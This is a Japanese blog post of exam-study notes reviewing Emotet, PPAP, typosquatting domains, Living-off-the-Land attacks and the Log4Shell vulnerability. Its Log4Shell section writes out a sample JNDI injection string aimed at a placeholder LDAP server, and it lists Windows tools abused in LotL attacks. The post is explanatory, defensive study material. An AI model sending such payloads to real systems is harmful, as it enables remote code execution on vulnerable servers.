【情報処理安全確保支援士】2022年 近年話題になったマルウェアや脆弱性のおさらい

2023年4月3日月曜日

サイバー攻撃 セキュリティ 情報処理安全確保支援士

t f B! P L

 

近年話題になったマルウェアや脆弱性のおさらい







エモテット(Emotet)


2014年に出現して以降、機能を変化させながら世界中で感染を広げました。

特徴

・ 感染拡大にメールを利用する(なりすましメールやフィッシングメールなど)
・ 過去のメールを読み出し、引用などをして自動的にメールを生成・送信する
・ 添付ファイル(ワード、XLL、CSVなど)のマクロ機能を実行させて本体をダウンロードさせる
・ モジュール型のため柔軟な機能追加で進化する


エモテットはメールに添付されたファイルを受信者が実行し、起動したソフトウェアがマクロ機能を有効にするかのメッセージを表示したときにOKを押してしまうと、そのマクロ機能を使ってコンピュータに感染します。

一度感染するとそのコンピュータ内のメールを検索して内容を読み取り、自動的に「それっぽいメール」を生成してエモテットが仕込まれたファイルを添付して送信します。
過去にメールを受信したり送信したことのある宛先へ、相手が本物だと思い込んでしまうような文章を作るので、感染率が高くなります。

また、エモテットはコンピュータ内に潜伏し続け、C&Cサーバからの命令がくるのをじっと待機してアップデートを行いながら進化してさらに感染を拡大します。



エモテットはPPAPでさらに感染を拡大


2020年に添付ファイルをパスワード付ZIPで圧縮する機能が追加されました。

PPAPとは

- P:パスワード付ZIP暗号化ファイルを作る
- P:パスワードを送る
- A:暗号化(あ=A)
- P:プロトコル

ピコ太郎の「ペン・パイナッポー・アッポー・ペン」に引っ掛けて日本で使われるようになりました。
情報セキュリティの会話のなかでさらっと出てくる単語なので覚えておきましょう。
(PPAPが撲滅されるその時まで...)


PPAPの特徴

・データとパスワードの両方を入手しないとファイルを複合できない
・パスワード付ZIP圧縮により暗号化されているためファイルの中のマルウェアを検知できない
・重要なデータだ思い込んでついファイルを開いてしまう


PPAPの問題点

・PPAP対応製品を使っている場合は間違った宛先へ両方とも送ってしまい意味がない
・宛先を手入力しても間違えるときは大抵両方とも間違えて送ってしまう
・メール情報を盗聴・窃取できる状況であればデータとパスワードの両方を盗まれる可能性が高い
・そもそも現在の通信経路上ではSSL/TLSで保護されているため盗聴は容易ではない


PPAPでデータを送る方法はピコ太郎より前から存在しており、国もこの方法を推奨していた時期がありました。
しかし、問題点も多くエモテットなどのマルウェアの感染を拡大させる要因にもなることが認識されてからは国や企業も廃止の方向に舵をきるようになります。


PPAPは廃止の動き




PPAPはドッペルゲンガー・ドメインとの組み合わせで最悪の情報漏えい


ドッペルゲンガー・ドメインとは

タイプミスしやすいドメイン名を取得し、ユーザーが間違ってアクセスするのを待ち受けたり、フィッシング用のメールないのアクセス先として設定する。


ドッペルゲンガー・ドメイン(gmai.com)による情報漏えいが増加



学校や会社などで受信するメールを個人的に利用しているメールへ自動転送する設定をすることで、家でも確認できて便利に使おうと思っていたら、設定したメールのアドレスをタイプミスしてしまい違う宛先へデータを送り続けていたという情報漏えいの実例もあります。

パスワード付圧縮ファイルで送った重要な情報も、パスワードを同じ宛先へ送っているため受信者は難なく開くことができてしまいます。



エモテットの終息

2021年1月、欧州各国の法執行機関の取組みによりエモテットは事実上終息したとされています。

エモテット終息への取組み

・エモテットに命令やモジュールなどを送信していたサーバが押収、関係者の一部を逮捕
・押収したサーバからエモテットを無害化するモジュールを送信
・さらにエモテットに感染している端末を特定しISPを介して通知を行う

これにより、エモテットの感染報告は日本においてもほぼ無くなりました。
しかし...



エモテットが復活、日本でも感染が急拡大


-2021年11月にわずかな変更が加えられたエモテットが検知される(BlackBerry Japan株式会社)




エモテットを運用していた犯罪グループで逮捕を免れたメンバーが別の犯罪グループのサーバを借りてエモテットを配布し始めるなど、犯罪グループの横のつながりにより復活しつつあると言われています。

エモテットに感染しないためもの、まずはPPAPを廃止し不用意に添付ファイルを開いたりマクロを有効化しないように気を付けましょう。




LotL(Living Off The Land):環境寄生型/自給自足型 攻撃


外部から攻撃ツールやプログラムをもちこまず、侵入したコンピュータやネットワークの正規ツール、Windowsの標準コマンドを使う攻撃手法。
正規のプログラムやツールを使用してマルウェア検出を回避する。


LotLの例

- Powershell, rundll.exe, regsvr32.exe, certutil.exe, wmin.exe, schtasks.exeなどでプロセスを実行
- Ipconfig、net、query、netstat、ping、whoamiなどでネットワーク環境を調査
- WMIを使って環境を検知し、マルウェア検出を回避する
- タスクスケジューラーを使った遅延実行による検出の回避


LotL攻撃を検知するには高度なヒューリスティック分析(悪意のあるプログラムの活動を分析する)が必要になってきます。




Apache Log4j の脆弱性


2021年12月10日に公表されJPCERT/CCでも注意喚起を発行 (https://www.jpcert.or.jp/newsflash/2021122401.html


Log4jとは

- Javaで制作されたログ出力ソフトウェア(log4j-XX.X.X.jar)

- Apacheの公式ページで配布されている

- Javaのログ出力ライブラリとして一般的であり、多くのJavaソフトウェアやアプライアンス機器が利用している

- iCloudやSteam、Minecraftなどユーザーの多いサービスやアプリケーションでも使われている



脆弱性の内容

- 共通脆弱性識別子(CVE-2021-44228)が割り当てられ「Log4Shell」と呼ばれる

- ログに“特定の文字列”を記録させることでJNDI lookup機能により変数として読み込まれ指定のサーバへアクセスする手
(例えばhttpヘッダのUser-Agentに{jndi:ldap://xxxxx.com/a}といった文字列を埋め込む)

- Apache Log4j 2.15.0 より前の2系のバージョンで影響がある

- 共通脆弱性評価システム(CVSS)のスコアは10段階中の10と最高レベルの深刻度

- アメリカのFTC(Federal Trade Commission:連邦取引委員会)は、消費者保護の観点から、Log4Shellへの対策を怠った企業の責任を追及することを表明





マルウェアによる被害状況








※ アンケート期間は 2022 年 3 月 11 日~14 日、有効回答企業数は 1,547 社(インターネット調査


このアンケートはロシアがウクライナに侵攻(2022年2月24日)のすぐ後に行われています。
侵攻前からロシアによるサイバー攻撃が活発になっていた時期でもあり、「1年以内にサイバー攻撃を受けた」企業は36.1%に上っていますが、その内訳をみても企業規模に関係なく攻撃されており全ての企業が他人事ではなくサイバー攻撃を受ける可能性があることを示す結果となっています。

特にランサムウェアの被害は拡大する一方です。




サイバーセキュリティに対して個人の意識だけでなく、企業の取組みも本腰をいれて実施しなければならない時代になってきました。

2022年5月に成立した「経済安全保障推進法」により基幹インフラに関わる企業には情報セキュリティへの対策に関して政府による事前の審査が実施されるようになります。
まだ「審査・勧告・命令」が実施されるのは2024年2月と先ですが、内容によっては大企業だけでなく下請けの企業に対しても体制の必要性が迫られるかもしれません。

2022年の防衛費1.5倍のなかでもサイバーセキュリティ人員の増加に対する予算が増額されており、情報セキュリティにたいしての国の支援も手厚くなってきています。

マルウェアや脆弱性などの情報を常にアップデートしていくことも地味な作業ですが大事になってくると思います。

以上。
読んで頂き有難うございました。





他の記事も良ければ読んでください。



このブログを検索

ブログをよくする

自己紹介

自分の写真
はじめまして。あまるちゃんです。 子供のプログラミング学習に協力できるように教え方を勉強中です。 このブログでは自分が学んだことを投稿していきます。

連絡フォーム

名前

メール *

メッセージ *

QooQ